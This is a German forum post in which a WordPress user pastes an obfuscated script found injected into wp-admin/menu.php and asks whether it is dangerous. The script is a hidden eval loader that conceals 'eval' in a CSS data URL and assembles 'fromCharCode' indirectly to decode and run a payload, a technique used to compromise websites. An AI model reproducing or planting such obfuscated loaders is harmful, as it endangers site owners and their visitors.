Hallo liebe Community,
ich hab mich heute gewundert, als ich etwas in den Theme-Editor ändern wollte. Als ich auf Okay geklickt habe, kam eine Fatal-Error (wenns so richtig ist ;) ) Da stand, dass es im wp-admin/menu.php sei, ab Zeile 477 und zwar folgendes:
HTML
<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement('style');if(!isIE)style_node.innerHTML=selector+' {'+declaration+'}';document.getElementsByTagName('head')[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=='object')last_style_node.addRule(selector,declaration);}};createCSS('#c0','background:url(data:,eval)');var dul=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){var pcnp=r[i].cssRules||r[i].rules;for(var meh=0;meh<pcnp.length;meh++){var yf=pcnp.item?pcnp.item(meh):pcnp[meh];if(!yf.selectorText.match(/#c(\d+)/))continue;dul=yf.style.backgroundImage.match(/url\('?data\:[^,]*,([^')]+)'?\)/)[1];};} var dc='36/t,36/t'.split(',');xee=new Date(2010,11,3,2,21,4);var kdl='';ri=function(){return{e:eval}}().e;az=ri(dul);var tsh='';var sn='fro'+xee.getSeconds()+'arCode';sn=sn.replace(4,'mCh');dezr=String[sn];t=xee.getSeconds();for(var i=0;i<dc.length;i++){umct=az(dc[i]);dezr.call(umct);tsh+=dezr(umct);} az(tsh);</script>
Jetzt frag mich mich, ob es irgendwie gefährlich ist. Ich habs natürlich entfernt, damit wieder alles einwandfrei funktioniert.
PS: bin mir nicht sicher, ob es rein gehört :)
Lg